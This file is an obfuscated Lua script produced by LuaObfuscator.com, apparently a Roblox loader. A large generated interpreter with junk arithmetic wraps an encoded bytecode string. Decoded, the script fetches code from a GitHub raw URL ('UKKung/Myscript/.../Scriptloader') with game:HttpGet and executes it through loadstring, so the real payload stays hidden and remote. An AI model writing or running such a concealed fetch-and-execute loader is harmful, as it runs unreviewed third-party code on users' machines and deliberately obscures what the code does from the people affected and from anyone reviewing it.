--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1 ;return v39;end;v23=nil;v23=function()local v40,v41=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (2 -0) ;return (v41 * (911 -655)) + v40 ;end;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v72=0;while true do if (v72==0) then v20=v0(v3(v31,1,1));return "";end end else local v73=v2(v0(v31,16));if v20 then local v93=v5(v73,v20);v20=nil;return v93;else return v73;end end end);v18=1;end if (v18==7) then v30=function(v32,v33,v34)local v42=v32[1];local v43=v32[2];local v44=v32[3];return function(...)local v65=1;local v66= -1;local v67={...};local v68=v12("#",...) -1 ;local function v69()local v74=v42;local v75=v43;local v76=v44;local v77=v28;local v78={};local v79={};local v80={};for v88=0 -0 ,v68 do if ((3652>(2107 -(43 + 11))) and (v88>=v76)) then v78[v88-v76 ]=v67[v88 + ((3746 -1755) -(944 + 1046)) ];else v80[v88]=v67[v88 + 1 + 0 ];end end local v81=(v68-v76) + (73 -(43 + 29)) + 0 ;local v82;local v83;while true do local v89=0 + 0 ;local v90;while true do if ((((3455 -2168) -839)<=(6549 -(2934 + 386))) and (v89==0)) then v90=698 -(33 + 665) ;while true do if (((6568 -5164)<=3064) and (v90==(0 + 0))) then local v99=(0 -0) -(0 -0) ;local v100;while true do if ((v99==(1791 -(415 + 1376))) or ((5291 -(975 + 479))<=(4585 -(128 + 705)))) then v100=0 + 0 ;while true do if ((v100==(1 + (0 -0))) or ((5631 -3535)>(2058 + 2207))) then v90=1;break;end if ((((0 -0) -0)==v100) or ((10470 -(2262 + 4659))<=(1623 + (1345 -512)))) then local v111=(0 -0) -0 ;while true do if ((v111==(646 -(355 + 291))) or (((14205 -8676) -3578)>(5990 -(1528 + 246)))) then v82=v74[v65];v83=v82[1 + 0 ];v111=229 -(212 + 16) ;end if (((3768 -(883 + 744))<=3156) and (v111==(2 -1))) then v100=1;break;end end end end break;end end end if ((v90==(1972 -(1169 + 802))) or ((2081 -(168 + 1173))==(6464 -3670))) then if ((v83<=(3 -1)) or ((3335 -(216 + 682))>=(766 + 1672))) then if ((v83<=(0 + 0)) or (4398<=(4098 -(1 + 69 + (2116 -(1261 + 377)))))) then v80[v82[2 + 0 ]]();elseif ((v83==(407 -(311 + 95))) or ((1380 + 3396)==((1631 -(970 + 497)) + 4190))) then v80[v82[2 + 0 ]]=v82[3 + 0 ];else local v114=(2564 -(58 + 676)) -(834 + 996) ;local v115;local v116;local v117;local v118;local v119;while true do if (((675 + 1744)<3228) and (v114==(0 + 0))) then v115=0 + 0 ;v116=nil;v114=1435 -((2243 -(131 + 1459)) + 781) ;end if ((v114==(1 -0)) or ((6629 -4781)==(3835 -((781 -(471 + 154)) + 5 + 45)))) then v117=nil;v118=nil;v114=6 -4 ;end if (((2054 -(53 + 1012))<=((19965 -(699 + 506)) -(14850 -(705 + 142)))) and (v114==((2 -1) + 1))) then v119=nil;while true do if ((v115==((3898 -(886 + 1029)) -(1700 + 281))) or ((1970 -(209 + 121))>2792)) then for v151=v116,v66 do local v152=0;local v153;while true do if ((((8888 -(30 + 1389)) -(5066 -2557))>=(74 + 3060)) and (v152==(0 + 0))) then v153=0;while true do if (((0 + 0)==v153) or ((11516 -7299)<(1230 + 2114))) then v119=v119 + (1010 -(568 + 441)) ;v80[v151]=v117[v119];break;end end break;end end end break;end if ((v115==(0 -0)) or ((320 -156)>(2547 -1683))) then local v146=0 + 0 + 0 ;while true do if ((v146==(3 -2)) or (4914==(107 + 11))) then v115=1 + 0 ;break;end if ((((2317 -708) + (2515 -(12 + 1595)))>=982) and (0==v146)) then v116=v82[1220 -((2002 -(1069 + 281)) + (1459 -893)) ];v117,v118=v77(v80[v116](v13(v80,v116 + (1792 -(164 + 1561 + 66)) ,v82[1350 -((1691 -(221 + 501)) + 378) ])));v146=1 + 0 ;end end end if ((((4607 -3025) + 3351)>=(1653 + 940)) and (v115==1)) then v66=(v118 + v116) -(1 + (1096 -(348 + 748))) ;v119=1912 -(434 + 1478) ;v115=1098 -((1502 -657) + 251) ;end end break;end end end elseif ((v83<=(5 -1)) or ((1607 -(243 + 110))>=(4734 -(3082 -(104 + 271))))) then if (((3754 -1862)<4003) and (v83==(1642 -(848 + 791)))) then do return;end else v80[v82[663 -(134 + 277 + 250) ]]=v34[v82[8 -5 ]];end elseif ((4885==(5040 -(30 + 125))) and (v83==(15 -10))) then local v122=0;local v123;while true do if ((v122==(0 -0)) or ((1125 + 1540)<((16955 -8665) -6202))) then v123=v82[1675 -(182 + 1491) ];v80[v123]=v80[v123](v13(v80,v123 + (1 -0) ,v66));break;end end else local v124=0 + 0 ;local v125;local v126;local v127;while true do if ((1655<(302 + 2349)) and ((1927 -(722 + 1204))==v124)) then v127=nil;while true do if ((v125==(643 -((724 -392) + (794 -483)))) or (((1347 -(315 + 882)) + 76)==(11423 -8136))) then local v147=0 -0 ;while true do if (((9772 -5490)>(440 + 1476)) and (v147==(0 + 0))) then local v155=967 -(901 + 66) ;while true do if ((((307 + 8395) -(444 + 4076))<(10150 -5418)) and (v155==((2095 -(808 + 464)) -(443 + 243 + 136)))) then v147=(1716 -(1145 + 570)) -0 ;break;end if ((1554>(1544 -(201 + 335))) and (v155==(0 + 0))) then v126=v82[236 -(34 + 200) ];v127=v80[v82[2 + 1 ]];v155=1 + 0 ;end end end if ((v147==1) or ((159 + 75)>=(4324 -3143))) then v125=614 -(489 + 124) ;break;end end end if ((v125==(1 + 0)) or ((4863 -2251)==((7880 + 7984) -12094))) then v80[v126 + 1 + 0 ]=v127;v80[v126]=v127[v82[4]];break;end end break;end if (((1304 -(103 + 459))<=3576) and (v124==(0 + 0))) then local v135=1848 -(1414 + 434) ;while true do if ((((9786 -6522) + 1245)<=4584) and (v135==(320 -((38 -12) + 183 + 111)))) then v125=0;v126=nil;v135=1;end if ((v135==1) or (727>=(2414 -(15 + 37)))) then v124=(2 -1) + 0 ;break;end end end end end v65=v65 + (1839 -(765 + 1073)) ;break;end end break;end end end end A,B=v28(v11(v69));if  not A[1] then local v91=v32[4][v65] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end if (v18==6) then v29=nil;v29=function()local v45=0 -0 ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v45~=(752 -(511 + 241))) then else local v92=1223 -(1105 + 118) ;while true do if (v92==(1 -0)) then v45=1 + 0 ;break;end if (v92~=(0 + 0)) then else v46=0 + 0 ;v47=nil;v92=1;end end end if (v45==(2 + 1)) then v52=nil;while true do local v94=448 -(12 + 436) ;while true do if (v94~=1) then else if (v46==(2 -1)) then local v101=0 + 0 ;while true do if (v101==(2 + 0)) then v46=2;break;end if (v101==0) then v51=v24();v52={};v101=787 -(166 + 620) ;end if (v101~=(1 + 0)) then else for v106=1,v51 do local v107=0;local v108;local v109;local v110;while true do if (v107~=(1386 -(1067 + 318))) then else v110=nil;while true do if (v108~=1) then else if (v109==(1 + 0)) then v110=v22()~=0 ;elseif (v109==(1481 -(446 + 1033))) then v110=v25();elseif (v109==(3 + 0)) then v110=v26();end v52[v106]=v110;break;end if ((0 + 0)==v108) then local v137=0 -0 ;while true do if (v137~=(1 + 0)) then else v108=2 -1 ;break;end if (v137~=(1491 -(1482 + 9))) then else v109=v22();v110=nil;v137=1;end end end end break;end if (v107~=(1645 -(765 + 880))) then else local v130=0 -0 ;while true do if (v130==0) then v108=0 + 0 ;v109=nil;v130=1;end if (v130~=1) then else v107=1;break;end end end end end v50[3 + 0 ]=v22();v101=1 + 1 ;end end end break;end if (v94==0) then if ((66 -(42 + 24))==v46) then local v102=0 -0 ;while true do if (v102==(1378 -(1123 + 255))) then v47={};v48={};v102=2 -1 ;end if (v102~=(885 -(819 + 65))) then else v49={};v50={v47,v48,nil,v49};v102=6 -4 ;end if (v102~=(5 -3)) then else v46=3 -2 ;break;end end end if (v46==(1722 -(1637 + 83))) then local v103=0 + 0 ;while true do local v104=0 + 0 ;while true do if (v104==(0 + 0)) then if (v103==(1 + 0)) then local v128=567 -(66 + 501) ;while true do if ((0 -0)~=v128) then else for v138=2 -1 ,v24() do v49[v138]=v24();end return v50;end end end if ((0 + 0)==v103) then local v129=225 -(17 + 208) ;while true do if (v129~=(4 -3)) then else v103=1 + 0 ;break;end if (v129==0) then for v140=1,v24() do local v141=0 -0 ;local v142;local v143;while true do if (v141==(0 -0)) then v142=0 -0 ;v143=nil;v141=58 -(8 + 49) ;end if (v141~=(1 + 0)) then else while true do if (v142~=0) then else v143=v22();if (v21(v143,1 + 0 ,1)~=(0 -0)) then else local v158=0;local v159;local v160;local v161;local v162;local v163;local v164;while true do if (v158~=(1985 -(1435 + 548))) then else v163=nil;v164=nil;v158=3;end if (v158==(1 -0)) then v161=nil;v162=nil;v158=3 -1 ;end if (v158==(11 -8)) then while true do if (v159==(20 -(7 + 13))) then local v167=0 + 0 ;while true do if (v167==(103 -(45 + 58))) then v160=0 -0 ;v161=nil;v167=1;end if (v167==(1405 -(1144 + 260))) then v159=1;break;end end end if (v159~=(2 -0)) then else v164=nil;while true do if (v160==(309 -(123 + 186))) then local v168=1028 -(326 + 702) ;while true do if (v168~=0) then else v161=0 -0 ;v162=nil;v168=1 + 0 ;end if (v168==(1 + 0)) then v160=1;break;end end end if (v160~=(1 + 0)) then else v163=nil;v164=nil;v160=4 -2 ;end if (v160~=(1492 -(1105 + 385))) then else while true do if ((5 -2)~=v161) then else if (v21(v163,13 -10 ,5 -2 )~=1) then else v164[4 + 0 ]=v52[v164[468 -(235 + 229) ]];end v47[v140]=v164;break;end if (v161~=(0 -0)) then else local v170=0;local v171;local v172;while true do if (v170==(1018 -(676 + 342))) then v171=0 + 0 ;v172=nil;v170=834 -(590 + 243) ;end if (v170~=1) then else while true do if (v171~=(0 -0)) then else v172=88 -(67 + 21) ;while true do if (0~=v172) then else local v184=0 + 0 ;while true do if (v184==0) then v162=v21(v143,1 + 1 ,3);v163=v21(v143,3 + 1 ,6);v184=1 + 0 ;end if (v184~=(774 -(336 + 437))) then else v172=1962 -(1491 + 470) ;break;end end end if ((1 + 0)==v172) then v161=1 + 0 ;break;end end break;end end break;end end end if (v161~=(1693 -(695 + 996))) then else local v173=473 -(469 + 4) ;local v174;local v175;while true do if ((4 -3)==v173) then while true do if (v174~=(534 -(163 + 371))) then else v175=0 + 0 ;while true do if (v175~=(518 -(195 + 322))) then else v161=1332 -(825 + 504) ;break;end if (v175~=(0 + 0)) then else local v185=551 -(211 + 340) ;local v186;while true do if (v185==(0 + 0)) then v186=0 -0 ;while true do if (v186==1) then v175=1 + 0 ;break;end if (v186~=(0 + 0)) then else if (v21(v163,1 + 0 ,1081 -(699 + 381) )~=(700 -(13 + 686))) then else v164[2]=v52[v164[2]];end if (v21(v163,2 + 0 ,2)==1) then v164[2 + 1 ]=v52[v164[3 + 0 ]];end v186=1;end end break;end end end end break;end end break;end if (0==v173) then v174=0 + 0 ;v175=nil;v173=1;end end end if (v161==(1 -0)) then local v176=0;local v177;while true do if (v176~=(0 -0)) then else v177=0;while true do if ((0 + 0)~=v177) then else v164={v23(),v23(),nil,nil};if (v162==(0 -0)) then local v180=0 + 0 ;local v181;local v182;local v183;while true do if (v180==(2 -1)) then v183=nil;while true do if (v181~=0) then else local v189=1284 -(657 + 627) ;while true do if (v189~=(1 + 0)) then else v181=1886 -(1018 + 867) ;break;end if (v189~=(0 -0)) then else v182=0 -0 ;v183=nil;v189=3 -2 ;end end end if (v181~=1) then else while true do if (v182~=(0 -0)) then else v183=0;while true do if (v183~=(0 -0)) then else v164[4 -1 ]=v23();v164[4]=v23();break;end end break;end end break;end end break;end if (v180==(1793 -(517 + 1276))) then v181=0 -0 ;v182=nil;v180=1;end end elseif (v162==(2 -1)) then v164[5 -2 ]=v24();elseif (v162==2) then v164[1 + 2 ]=v24() -((5 -3)^(50 -34)) ;elseif (v162==(6 -3)) then local v190=0 -0 ;local v191;local v192;while true do if ((0 -0)~=v190) then else v191=677 -(521 + 156) ;v192=nil;v190=1 -0 ;end if (v190==(699 -(240 + 458))) then while true do if (v191~=(740 -(154 + 586))) then else v192=0 + 0 ;while true do if (v192~=0) then else v164[1974 -(674 + 1297) ]=v24() -(2^(1964 -(821 + 1127))) ;v164[6 -2 ]=v23();break;end end break;end end break;end end end v177=1115 -(1026 + 88) ;end if ((2 -1)~=v177) then else v161=2 -0 ;break;end end break;end end end end break;end end break;end if (v159==1) then v162=nil;v163=nil;v159=1 + 1 ;end end break;end if (v158~=(0 -0)) then else v159=0 -0 ;v160=nil;v158=1;end end end break;end end break;end end end for v144=1,v24() do v48[v144-(3 -2) ]=v29();end v129=1;end end end break;end end end end v94=1 + 0 ;end end end break;end if ((871 -(703 + 166))~=v45) then else v50=nil;v51=nil;v45=5 -2 ;end if (v45==(1 + 0)) then v48=nil;v49=nil;v45=2;end end end;v30=nil;v18=7;end if (v18==3) then v24=nil;v24=function()local v53,v54,v55,v56=v1(v16,v19,v19 + (360 -(284 + 73)) );v19=v19 + 2 + 2 ;return (v56 * 16777216) + (v55 * 65536) + (v54 * (617 -361)) + v53 ;end;v25=nil;v18=4;end if (v18==1) then v21=nil;v21=function(v35,v36,v37)if v37 then local v84=(v35/(2^(v36-(1 + 0))))%(((985 -(73 + 411)) -(230 + 269))^(((v37-(1 + 0)) -(v36-(4 -3))) + ((1 + 0) -0))) ;return v84-(v84%(725 -(502 + 222))) ;else local v85=(0 -0) -0 ;local v86;while true do if (v85==(800 -(407 + 106 + 287))) then v86=(2 + 0 + 0)^(v36-(4 -3)) ;return (((v35%(v86 + v86))>=v86) and (1119 -(183 + 935))) or (1855 -(1406 + 449)) ;end end end end;v22=nil;v18=2;end if (v18==4) then v25=function()local v57=v24();local v58=v24();local v59=(3879 -2740) -(1002 + 136) ;local v60=(v21(v58,1944 -((2426 -(211 + 702)) + 430) ,32 -(8 + 4) ) * (2^(54 -22))) + v57 ;local v61=v21(v58,9 + 12 ,118 -87 );local v62=((v21(v58,25 + 7 )==(2 -1)) and  -((1 -0) -0)) or 1 ;if (v61==(0 -0)) then if (v60==0) then return v62 * (1726 -(357 + 1369)) ;else v61=1 + 0 ;v59=1512 -(1020 + 492) ;end elseif (v61==(680 + 1367)) then return ((v60==(0 -0)) and (v62 * ((1159 -(676 + 482))/(0 + 0)))) or (v62 * NaN) ;end return v8(v62,v61-(3716 -2693) ) * (v59 + (v60/(((94 + 765) -(457 + 400))^52))) ;end;v26=nil;v26=function(v38)local v63;if  not v38 then local v87=0 -(0 -0) ;while true do if (v87==0) then v38=v24();if (v38==(1786 -(923 + 863))) then return "";end break;end end end v63=v3(v16,v19,(v19 + v38) -(1142 -(531 + 610)) );v19=v19 + v38 ;local v64={};for v70=1, #v63 do v64[v70]=v2(v1(v3(v63,v70,v70)));end return v6(v64);end;v18=5;end if (v18==5) then v27=v24;v28=nil;v28=function(...)return {...},v12("#",...);end;v18=6;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F552O4B756E672F4D797363726970742F6D61696E2F5363726970746C6F6164657200083O0012043O00013O001204000100023O002006000100010003001201000300044O0002000100034O00055O00026O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
